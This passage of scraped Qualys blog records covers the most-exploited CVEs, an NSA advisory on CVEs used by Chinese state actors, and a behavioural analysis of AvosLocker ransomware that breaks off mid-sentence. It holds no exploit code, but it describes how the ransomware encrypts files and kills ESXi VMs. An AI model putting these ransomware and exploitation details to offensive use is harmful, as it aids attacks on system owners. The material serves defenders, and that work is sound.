Vulnerability**\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (77 times)**\n\nIt was exploited by 10 Malware, 26 Threat Actors, and 5 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 376157, 730297**\n\n**In the "Top 12 Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2021-44228, or "Log4Shell," is a severe vulnerability in Apache's log4j Java library. The flaw exploits the 'lookups' feature of log4j, enabling an attacker to use a specially crafted input to trigger the execution of a remote Java class on an LDAP server, leading to Remote Code Execution.\n\nThis issue is highly dangerous if the user input containing specific characters is logged by log4j. It can trigger Java method lookup, resulting in the execution of a user-defined remote Java class on an LDAP server, leading to Remote Code Execution (RCE) on the server running the vulnerable log4j instance.\n\n### 11\\. **CVE-2014-6271: Shellshock \u2013 Linux Bash Vulnerability**\n\n**Vulnerability Trending Over Years: 2014, 2016, 2017, 2020, 2021, 2022, 2023 (70 times)**\n\nIt was exploited by 18 Malware, 1 Threat Actors, and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 122693, 13038, 150134**\n\nShellshock (CVE-2014-6271) is a critical vulnerability affecting the Unix Bash shell in many Linux, Unix, and Mac OS systems. It allows remote code execution by misusing Bash's processing of environment variables, enabling attackers to append and execute malicious commands. It has a high severity score since it can impact multiple devices and applications, risking unauthorized data access or service disruption,\n\n### 12\\. **CVE-2018-8174: Windows VBScript Engine Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2018, 2020, 2023 (30 times)**\n\nIt was exploited by 21 Malware, 10 Threat Actors, and 7 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 91447**\n\nCVE-2018-8174 is a critical vulnerability in Microsoft Windows' VBScript Engine, enabling remote code execution. Triggered by viewing a malicious website with Internet Explorer or opening a rigged Microsoft Office document, this flaw allows an attacker to manipulate memory objects and execute code. \nThe attacker can fully control the system if the user has administrative rights.** \n**\n\n### 13\\. **CVE-2013-0074: Microsoft Silverlight Could Allow Remote Code Execution**\n\n**Vulnerability Trending Over Years**_**: **_**2023 (8 times)**\n\nIt was exploited by 62 Malware 50 Ransomware and was trending in the wild as recently as August 20, 2023.\n\n**Qualys Vulnerability Detection (QID): 90870**\n\nCVE-2013-0074 is a remote code execution vulnerability in Microsoft Silverlight, which permits a crafted Silverlight application to access memory unsafely, thereby leading to the execution of arbitrary code under the current user\u2019s security context.\n\nIf the user has admin rights, the attacker installs programs, alters or deletes data, or generates new accounts with full privileges. The user can be deceived into visiting a malicious website or clicking on a link, commonly through an email or instant message.\n\n### 14\\. **CVE-2012-0507: Oracle Java SE Remote Java Runtime Environment Vulnerability**\n\n**Vulnerability Trending Over Years: 2023 (10 times)**\n\nIt was exploited by 66 Malware, 3 Threat Actors, and 42 Ransomware and was trending in the wild as recently as July 26, 2023.\n\n**Qualys Vulnerability Detection (QID): 119956**\n\nCVE-2012-0507 is a critical vulnerability in the Java Runtime Environment (JRE) allowing untrusted Java applets to execute arbitrary code outside the Java sandbox. Originating from a flaw in the AtomicReferenceArray class implementation, **this vulnerability was exploited by Flashback Trojan in 2012**. It was observed to have led to one of the most significant known malware attacks on Apple devices. Attackers can exploit this vulnerability by tricking users into visiting a malicious website hosting a Java applet.\n\n### 15\\. **CVE-2019-19781: Citrix ADC and Citrix Gateway - Remote Code Execution (RCE) Vulnerability**\n\n**Vulnerability Trending Over Years: 2020, 2022, 2023 (60 times)**\n\nIt was exploited by 11 Malware, 12 Threat Actors, and 10 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 372305, 150273**\n\n**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2019-19781, or "Shitrix," is a significant vulnerability associated with Citrix Application Delivery Controller (ADC) and Citrix Gateway, allowing unauthenticated attackers to perform arbitrary code execution, granting them access to internal network resources.\n\nThe flaw resides in the VPN component of the affected products, enabling directory traversal and giving attackers both read and write access to the underlying file system.\n\n### 16\\. **CVE-2018-0802: Microsoft Office Memory Corruption Vulnerability**\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (19 times)**\n\nExploited by 29 Malware 24 Threat Actors, and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 110310**\n\nCVE-2018-0802 is a critical vulnerability within Microsoft Office and WordPad, which, if exploited, allows remote code execution via specially crafted files.\n\nAttackers can run arbitrary code in the current user's context, potentially taking over the system if the user holds administrative rights. This vulnerability was notably used in targeted attacks and was being actively exploited before Microsoft released a security update in January 2018 that correctly handles objects in memory, resolving the issue.\n\n### 17\\. **CVE-2021-26855: Microsoft Exchange Server Authentication Bypass (RCE)**\n\n**Vulnerability Trending Over Years:** **2021, 2023 (46 times)**\n\nIt was exploited by 19 Malware, 22 Threat Actors, and 9 Ransomware and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 50107, 50108**\n\n**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2021-26855, a part of the ProxyLogon exploit chain, is a server-side request forgery (SSRF) vulnerability in Microsoft Exchange Server that enables attackers to bypass authentication mechanisms and impersonate users.\n\nThe flaw allows arbitrary HTTP requests, granting access to users' mailboxes and enabling information theft. It has been widely exploited by various threat actors, leading to emergency patches by Microsoft.\n\n### 18\\. **CVE-2019-2725: Oracle WebLogic Affected by Unauthenticated RCE Vulnerability**\n\n**Vulnerability Trending Over Years: 2019, 2020, 2022, 2023 (53 times)** \n\nIt was exploited by 10 Malware, 4 Threat Actors, 9 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 150267, 87386** \n\nCVE-2019-2725 is a severe remote code execution vulnerability in Oracle WebLogic Server that allows unauthenticated attackers to execute arbitrary code over a network without user interaction. It was quickly weaponized to install cryptocurrency miners. \n\n### 19\\. **CVE-2018-13379: Fortinet FortiGate (FortiOS) System File Leak through Secure Sockets Layer (SSL)**\n\n**Vulnerability Trending Over Years: 2020, 2021, 2023 (41 times)** \n\nIt was exploited by 6 Malware, 13 Threat Actors, 6 Ransomware and was trending in the wild as recently as August 30, 2023.\n\n**Qualys Vulnerability Detection (QID): 43702** \n\n**In the "Top 12 Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier. **\n\nCVE-2018-13379 is a path traversal vulnerability found in the Fortinet FortiOS SSL VPN web portal. An unauthenticated attacker can read sensitive system files via specially crafted HTTP requests. The exploit could expose SSL VPN session data, leading to more severe attacks. \n\n### 20\\. CVE-2021-26084: Atlassian Confluence Server Webwork OGNL Injection RCE Vulnerability\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (35 times)**\n\nIt was exploited by 8 Malware, 6 Threat Actors, and 8 Ransomware and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 730172, 150368, 375839**\n\n**In the "Top 12 Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2021-26084 is a critical vulnerability in Atlassian's Confluence Server and Data Center, specifically within the Webwork OGNL component. This vulnerability can enable an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance, potentially compromising system integrity.\n\n## TruRisk Dashboard\n\nThe Qualys VMDR helps organizations get instant visibility into high-risk and top twenty vulnerabilities.\n\n[![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/09/Blog-3-1070x588.jpg)](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/09/Blog-3.jpg>)Fig 3. Qualys VMDR TruRisk Dashboard for Top 20 Vulnerabilities\n\nThe **Qualys VMDR TruRisk Dashboard** helps organizations to have complete visibility into open vulnerabilities that focus on the organization\u2019s global risk score and high-risk vulnerabilities with your organization\u2019s global risk score and high-risk vulnerabilities. Once you identify the vulnerable assets for these top twenty CVEs prioritized among your remediation owners, you can use Qualys Patch management to instantly reduce the risk.\n\nThe TruRisk VMDR Dashboard is available \u2013 [Download the Dashboard Here](<https://blog.qualys.com/wp-content/uploads/2023/09/Qualys_VMDR_TruRisk__Dashboard.zip>)\n\n## Key Insights & Takeaways\n\n * In the current Vulnerability Threat Landscape, identifying open vulnerabilities and effective remediation is the highest priority for every defender.\n * Among the vast scale of the CVEs available, you need to know the weaponized high-risk vulnerabilities that are actively targeted by Threat Actors, Malware, and ransomware families.\n * Use multi-dimensional Threat Intelligence to prioritize vulnerabilities rather than implementing multiple siloed threat approaches.\n * The Qualys VMDR with TruRisk automatically prioritizes vulnerabilities exploited in the wild with a TruRisk score of 90 or higher, greatly simplifying the prioritization process.\n\n## References\n\n * [Part 1: An In-Depth Look at the Latest Vulnerability Threat Landscape](<https://blog.qualys.com/product-tech/2023/07/11/an-in-depth-look-at-the-latest-vulnerability-threat-landscape-part-1>)\n * [Part 2: An In-Depth Look at the Latest Vulnerability Threat Landscape (Attackers\u2019 Edition)](<https://blog.qualys.com/vulnerabilities-threat-research/2023/07/18/part-2-an-in-depth-look-at-the-latest-vulnerability-threat-landscape-attackers-edition>)\n\n## Additional Contributors\n\n * **Shreya Salvi, Data Scientist, Qualys**\n * **Saeed Abbasi, Product Manager, Vulnerability Research**", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-09-04T14:00:00", "type": "qualysblog", "title": "Qualys Top 20 Most Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2012-0507", "CVE-2012-1723", "CVE-2013-0074", "CVE-2014-6271", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2018-13379", "CVE-2018-8174", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-2725", "CVE-2020-1472", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-44228"], "modified": "2023-09-04T14:00:00", "id": "QUALYSBLOG:6AFD8E9AB405FBE460877D857273A9AF", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-12T20:01:11", "description": "On October 6, 2022, the United States National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF>) on the Chinese government\u2014officially known as the People\u2019s Republic of China (PRC) states-sponsored cyber actors' activity to seek national interests. These malicious cyber activities attributed to the Chinese government targeted, and persist to target, a mixture of industries and organizations in the United States. They provide the top CVEs used since 2020 by the People's Republic of China (PRC) states-sponsored cyber actors as evaluated by the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI). The PRC malicious actor continues to exploit known vulnerabilities to target U.S. and vigorously allied networks and software and hardware companies to rob intellectual property and develop access to sensitive networks. \n\nThey stated that PRC state-sponsored cyber activities as one of the most significant and dynamic threats to U.S. government and civilian networks. The PRC state-sponsored cyber actors persist in targeting government and critical infrastructure networks with an increasing array of new and adaptive techniques. Some could pose a considerable risk to Information Technology Sector, telecommunications organizations, Defense Industrial Base (DIB) Sector, and other critical infrastructure organizations. \n\nPRC state-sponsored cyber actors continue to exploit known vulnerabilities and use publicly available tools to target victims. Here is a list of 20 publicly known vulnerabilities (CVEs) published by the NSA, along with affected products and associated Qualys VMDR QID(s) for each vulnerability: \n\n**Vendor**| **CVE**| **Vulnerability Type**| Qualys **QID**(s) \n---|---|---|--- \n| | | \nApache Log4j | CVE-2021-44228 | Remote Code Execution | 730302, 150441, 150440, and more \nPulse Connect Secure | CVE-2019-11510 | Arbitrary File Read | 38771 \nGitLab CE/EE | CVE-2021-22205 | Remote Code Execution | 375475 \nAtlassian | CVE-2022-26134 | Remote Code Execution | 730514, 376657, 150523 \nMicrosoft Exchange | CVE-2021-26855 | Remote Code Execution | 50107, 50108 \nF5 Big-IP | CVE-2020-5902 | Remote Code Execution | 38791, 373106 \nVMware vCenter Server | CVE-2021-22005 | Arbitrary File Upload | 216265, 216266 \nCitrix ADC | CVE-2019-19781 | Path Traversal | 372685, 150273, 372305 \nCisco Hyperflex | CVE-2021-1497 | Command Line Execution | 730070 \nBuffalo WSR | CVE-2021-20090 | Relative Path Traversal | NA \nAtlassian Confluence Server and Data Center | CVE-2021-26084 | Remote Code Execution | 150368, 375839, 730172 \nHikvision Webserver | CVE-2021-36260 | Command Injection | NA \nSitecore XP | CVE-2021-42237 | Remote Code Execution | 14012 \nF5 Big-IP | CVE-2022-1388 | Remote Code Execution | 150511, 730489, 376577 \nApache | CVE-2022-24112 | Authentication Bypass by Spoofing | 730361 \nZOHO | CVE-2021-40539 | Remote Code Execution | 375840 \nMicrosoft | CVE-2021-26857 | Remote Code Execution | 50107 \nMicrosoft | CVE-2021-26858 | Remote Code Execution | 50107 \nMicrosoft | CVE-2021-27065 | Remote Code Execution | 50107 \nApache HTTP Server | CVE-2021-41773 | Path Traversal | 150373, 150372, 710595 and more \nTable 1: Top CVEs most used by Chinese state-sponsored cyber actors since 2020 \n\nNSA stated that the threat actors use virtual private networks (VPNs) to obscure their activities and establish initial access. Multiple CVEs indicated in Table 1 let the actors stealthily acquire unauthorized access into sensitive networks, after which they pursue to develop persistence and reposition laterally to other internally connected networks. \n\nThe NSA highlights how the People\u2019s Republic of China (PRC) has targeted and compromised significant telecom establishments and network service providers mostly by exploiting publicly known vulnerabilities. Networks affected have varied from small office/home office (SOHO) routers to medium and large enterprise networks. \n\nPRC state-sponsored cyber actors readily exploit vulnerabilities to compromise unpatched network devices. The devices, such as Small Office/Home Office (SOHO) routers and Network Attached Storage (NAS) devices, serve as additional access points to route command and control (C2) traffic and act as means to conduct network intrusions on other entities. Furthermore, cyber defenders often overlook these devices, who work to maintain and keep pace with frequent software patching of Internet-facing services and endpoint devices. \n\n## Detect & Prioritize 20 Publicly Known Vulnerabilities using VMDR 2.0 \n\nQualys released several remote and authenticated QIDs for commonly exploited vulnerabilities. You can search for these QIDs in [Qualys VMDR 2.0](<https://www.qualys.com/apps/vulnerability-management-detection-response/>), Vulnerabilities tab by using the following QQL query: \n\n_vulnerabilities.vulnerability.cveIds: [CVE-2021-44228, CVE-2019-11510, CVE-2021-22205, CVE-2022-26134, CVE-2021-26855, CVE-2020-5902, CVE-2021-22005, CVE-2019-19781, CVE-2021-1497, CVE-2021-20090, CVE-2021-26084, CVE-2021-36260, CVE-2021-42237, CVE-2022-1388, CVE-2022-24112, CVE-2021-40539, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-41773]_ \n\n![](https://ik.imagekit.io/qualys/wp-content/uploads/2022/10/Vulnerabilities-Tab-1070x602.png)\n\nUsing, [Qualys VMDR 2.0](<https://www.qualys.com/apps/vulnerability-management-detection-response/>), you can also effectively prioritize these vulnerabilities using the [Qualys TruRisk](<https://blog.qualys.com/vulnerabilities-threat-research/2022/10/10/in-depth-look-into-data-driven-science-behind-qualys-trurisk>).\n\n![](https://ik.imagekit.io/qualys/wp-content/uploads/2022/10/Prioritization-1070x602.png)\n\n## Identify Vulnerable Assets using Qualys Threat Protection \n\nIn addition, you can locate vulnerable hosts through Qualys Threat Protection by simply clicking on the impacted hosts. This helps in effectively identifying and tracking this vulnerability. \n\n![](https://ik.imagekit.io/qualys/wp-content/uploads/2022/10/Threat-Protection-1070x660.png)\n\nUsing the Qualys Unified Dashboard, you can track, impacted hosts, their status, and overall management in real time. With trending enabled for dashboard widgets, you can keep track of the vulnerability trends in your environment. \n\nRead the Article (Qualys Customer Portal): [NSA Top Exploited CVEs | China State Actors](<https://success.qualys.com/support/s/article/000007011>) \n\n![](https://ik.imagekit.io/qualys/wp-content/uploads/2022/10/NSA-TOP-CVES-1070x1215.jpg)\n\n## Recommendations & Mitigations \n\nThe NSA, CISA, and FBI recommend U.S. and allied governments, critical infrastructure, and private sector organizations use the mitigation guidance provided to boost their defensive posture and decrease the threat of compromise from PRC state-sponsored threat cyber actors. \n\nHere is a summary of mitigations guidance provided by the NSA: \n\n * Update, prioritize and patch vulnerable systems as soon as possible, as listed in this article and the list provided by [CISA KEV](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). \n * Utilize phishing-resistant multi-factor authentication and require all accounts with a unique and strong password. \n * Block obsolete or unused protocols at the network edge. \n * Upgrade or replace end-of-life devices. \n * Move toward the Zero Trust security model. \n * Enable robust logging of Internet-facing systems and monitor the logs for anomalous activity. \n\nOne of the soundest methods that organizations of all sizes could stay on top of these vulnerabilities and end-of-life (EOL) network/device infrastructure as noted by NSA general mitigations guidelines is to catalog the infected assets and apply patches as soon as possible. This could be an effortless process if the corps utilize the power of Qualys VMDR 2.0. You can start your [Qualys VMDR 2.0 trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting, and patching the high-priority commonly exploited vulnerabilities. \n\n## Contributors\n\n * Felix Jimenez Saez, Director, Product Management, Qualys\n * Swapnil Ahirrao, Principal Product Manager, VMDR, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-07T20:03:01", "type": "qualysblog", "title": "NSA Alert: Topmost CVEs Actively Exploited By People\u2019s Republic of China State-Sponsored Cyber Actors", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134"], "modified": "2022-10-07T20:03:01", "id": "QUALYSBLOG:D38E3F9D341C222CBFEA0B99AD50C439", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-07T05:27:25", "description": "_AvosLocker is a ransomware group that was identified in 2021, specifically targeting Windows machines. Now a new variant of AvosLocker malware is also targeting Linux environments. In this blog, we examine the behavior of these two AvosLocker Ransomware in detail._\n\nAvosLocker is a relatively new ransomware-as-a-service that was first spotted in late June 2021. The attackers use spam email campaigns as initial infection vectors for the delivery of the ransomware payload. During the encryption, process files are appended with the ".avos" extension. An updated variant appends with the extension ".avos2". Similarly, the Linux version appends with the extension ".avoslinux".\n\nAfter every successful attack, the AvosLocker gang releases the names of their victims on the Dark Leak website hosted on the TOR network and provides exfiltrated data for sale. URL structure: `hxxp://avosxxx\u2026xxx[.]onion`\n\nThe AvosLocker gang also advertises their latest ransomware variants on the Dark Leak website. URL structure: `hxxp://avosjonxxx\u2026xxx[.]onion`\n\nThe gang has claimed, \u201cThe AvosLocker's latest Windows variant is one of the fastest in the market with highly scalable threading and selective ciphers.\u201d They offer an affiliate program that provides ransomware-as-a-service (RaaS) for potential partners in crime.\n\nRecently they have added support for encrypting Linux systems, specifically targeting VMware ESXi virtual machines. This allows the gang to target a wider range of organizations. It also possesses the ability to kill ESXi VMs, making it particularly nasty.\n\nAccording to [deepweb research](<https://blog.cyble.com/2022/01/17/avoslocker-ransomware-linux-version-targets-vmware-esxi-servers/>) by Cyble Research Labs, the Threats Actors of AvosLocker ransomware groups are exploiting Microsoft Exchange Server vulnerabilities using Proxyshell, compromising the victim\u2019s network.\n\nCVEs involved in these exploits are CVE-2021-34473, CVE-2021-31206, CVE-2021-34523, and CVE-2021-31207.\n\n### Technical Analysis of AvosLocker Windows Variant\n\n#### Command-Line Options\n\nThe following figure shows a sample of Command-Line Options.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-1-Command-Line-Option.png)Fig. 1: Command Line Option\n\nThe available options allow for control over items like enabling/disabling SMB brute force, mutex creation, or control over the concurrent number of threads. \nIf no options are given, the malware runs with default options as shown in figure 2, where it ignores encryption of network drives and SMB share. It runs 200 threads concurrently of its file encryption routine.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-2-Execution-with-Default-Parameter.png)Fig. 2: Execution with Default Parameter\n\nWhile execution, the malware console displays detailed information about its progress on the screen (fig. 3).\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-3-Progress-Details.png)Fig. 3: Progress Details\n\nMost of the strings in the malware are kept in the XOR encrypted format. The decryption routines are similar, only registers and keys are different (fig. 4). Strings are decrypted just before their use.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-4-Commonly-Used-Decryption-Routine.png)Fig. 4: Commonly Used Decryption Routine\n\nInitially, the malware collects the command line options provided while launching the application (fig. 5).\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-5-Get-command-line-Options.png)Fig. 5: Get command-line Options\n\nThen it decrypts the mutex name \u201cCheic0WaZie6zeiy\u201d and checks whether it is already running or not to avoid multiple instances (fig. 6).\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-6-Mutex-Creation.png)Fig. 6: Mutex Creation\n\nAs shown in figure 7, AvosLocker uses multi-threaded tactics. It calls the below APIs to create multiple instances of worker threads into memory and share file paths among multiple threads. Smartly utilizing the computing power of multi-core CPUs.\n\nAPIs called:\n\n * CreateIoCompletionPort()\n * PostQueuedCompletionStatus()\n * GetQueuedCompletionPort()\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-7-Use-of-CreateIoCompletionPort.png)Fig. 7: Use of CreateIoCompletionPort\n\nThe code creates multiple threads in a loop (fig. 8). The threads are set to the highest priority for encrypting data quickly.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-8-Create-Thread-In-Loop-and-Set-Priority.png)Fig. 8: Create Thread In-Loop and Set Priority\n\nAvosLocker ransomware performs a recursive sweep through the file system (fig. 9), searches for attached drives, and enumerates network resources using API WNetOpenEnum() and WnetEnumResource().\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-9-Search-Network-Share.png)Fig. 9: Search Network Share\n\nBefore selecting the file for encryption, it checks for file attributes and skips it if \u201c**FILE_ATTRIBUTE_HIDDEN**\u201d or \u201c**FILE_ATTRIBUTE_SYSTEM**\u201d as shown in figure 10.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-10-Check-File-Attribute.png)Fig. 10: Check File Attribute\n\nOnce the file attribute check is passed, it performs the file extension check. It skips files from encryption if its extension gets matched with one of the extensions shown in figure 11.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-11-Skip-Extension-List.png)Fig. 11: Skip Extension List\n\nIt also contains the list of files and folders that need to be skipped from the encryption (fig. 12).\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-12-Skip-File-Folder-List.png)Fig. 12: Skip File Folder List\n\nAvosLocker uses RSA encryption, and it comes with a fixed hardcoded ID and RSA Public Key of the attacker (fig. 13).\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-13-Hardcoded-Public-Key.png)Fig. 13: Hardcoded Public Key\n\nAfter file encryption using RSA, it uses the ChaCha20 algorithm to encrypt encryption-related information (fig. 14).\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-14-Use-of-ChaCha20.png)Fig. 14: Use of ChaCha20\n\nIt appends this encryption-related information (fig. 15) at the end of the file with Base64 encoded format.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-15-Encryption-Related-Information.png)Fig.15: Encryption Related Information\n\nThen it appends the "avo2" extension to the file using MoveFileWithprogressW (fig. 16).\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-16-Add-Extension-Using-Movie-File.png)Fig. 16: Add Extension Using Move File\n\nAs seen in figure 17, it has appended "avos2" extensions.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-17-File-with-Updated-Extension.png)Fig. 17: File with Updated Extension\n\nIt writes a ransom note (fig. 18) named \u201cGET_YOUR_FILES_BACK.txt\u201d to each encrypted directory before encryption of the file.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-18-Ransom-Note.png)Fig. 18: Ransom Note\n\nThe ransom note instructs the user to not to shut down the system in case encryption is in progress to avoid file corruption. It asks the victim to visit the onion address with the TOR browser to pay the ransom and to obtain the decryption key to decrypt the application or files.\n\n#### AvosLocker Payment System\n\nAfter submitting the "ID" mentioned on the ransom note to AvosLocker's website (fig. 19), the victim will be redirected to the "payment" page.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-19-AvosLockers-Website.png)Fig. 19: AvosLocker's Website\n\nIf the victim fails to pay the ransom, the attacker then puts the victim\u2019s data up for sale. Figure 20 shows the list of victims (redacted for obvious reasons) mentioned on the site.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-20-List-of-Victims.png)Fig. 20: List of Victims\n\nAvosLocker also offers an affiliate program that provides ransomware-as-a-service (RaaS). They provide \u201chelpful\u201d services to clients such as:\n\n * Supports Windows, Linux & ESXi.\n * Affiliate panel\n * Negotiation panel with push & sound notifications\n * Assistance in negotiations\n * Consultations on operations\n * Automatic builds\n * Automatic decryption tests\n * Encryption of network resources\n * Killing of processes and services with open handles to files\n * Highly configurable builds\n * Removal of shadow copies\n * Data storage\n * DDoS attacks\n * Calling services\n * Diverse network of penetration testers, access brokers and other contacts\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-21-Partnership-Program.png)Fig. 21: Partnership Program\n\n### Technical Analysis of AvosLocker Linux Variant\n\nIn this case, the AvosLocker malware arrives as an elf file. As shown in figure 22, the analyzed file is x64 based Linux executable file.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-22-FileDetails.png)Fig. 22: File Details\n\nIt\u2019s a command-line application having some command-line options (fig. 23).\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-23-Command-Line-Options.png)Fig. 23: Command-Line Options\n\nThe `<Thread count>` parameter as shown above represents the number of threads that can be created to encrypt files simultaneously. It possesses the capability to kill ESXi VMs based on the parameter provided while executing.\n\nUpon execution, the malware first collects information about the number of threads that need to be created. Then it checks for string \u201cvmfs\u201d in the file path provided as a command-line argument (fig. 24).\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-24-Checks-for-vmfs.png)Fig. 24: Checks for \u201cvmfs\u201d\n\nAfter that, it also checks for string \u201cESXi\u201d in the file path provided as a command-line argument (fig. 25).\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-25-Checks-for-ESXi.png)Fig. 25: Checks for \u201cESXi\u201d\n\nIf this parameter is found, then it calls a routine to kill the running ESXi virtual machine (fig. 26).\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-26-Code-to-Kill-ESXi-Virtual-Machine.png)Fig. 26: Code to Kill ESXi Virtual Machine\n\nThe command used for killing the ESXi virtual machine is as shown in figure 27.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-27-CommandToKillRunning_ESXi_Virtual_Machines.png)Fig. 27: Command to Kill Running ESXi Virtual Machine\n\nFurther, AvosLocker drops a ransom note file (fig. 28) at the targeted directory.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-28_Create_Ransom_Note.png)Fig. 28: Create ransom note\n\nAfter that, it starts creating a list of files that must be encrypted. Before adding a file path to the list, it checks whether it is a regular file or not (fig. 29). Only regular files are added to the encryption list.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-29-Check-File-Info.png)Fig. 29: Checks File Info\n\nAvosLocker skips the ransom note file and any files with the extension \u201cavoslinux\u201d from adding into the encryption list (fig. 30).\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-30-Skip-avoslinux-extension-filet.png)Fig. 30: Skip \u201cavoslinux\u201d Extension File\n\nThen it calls the 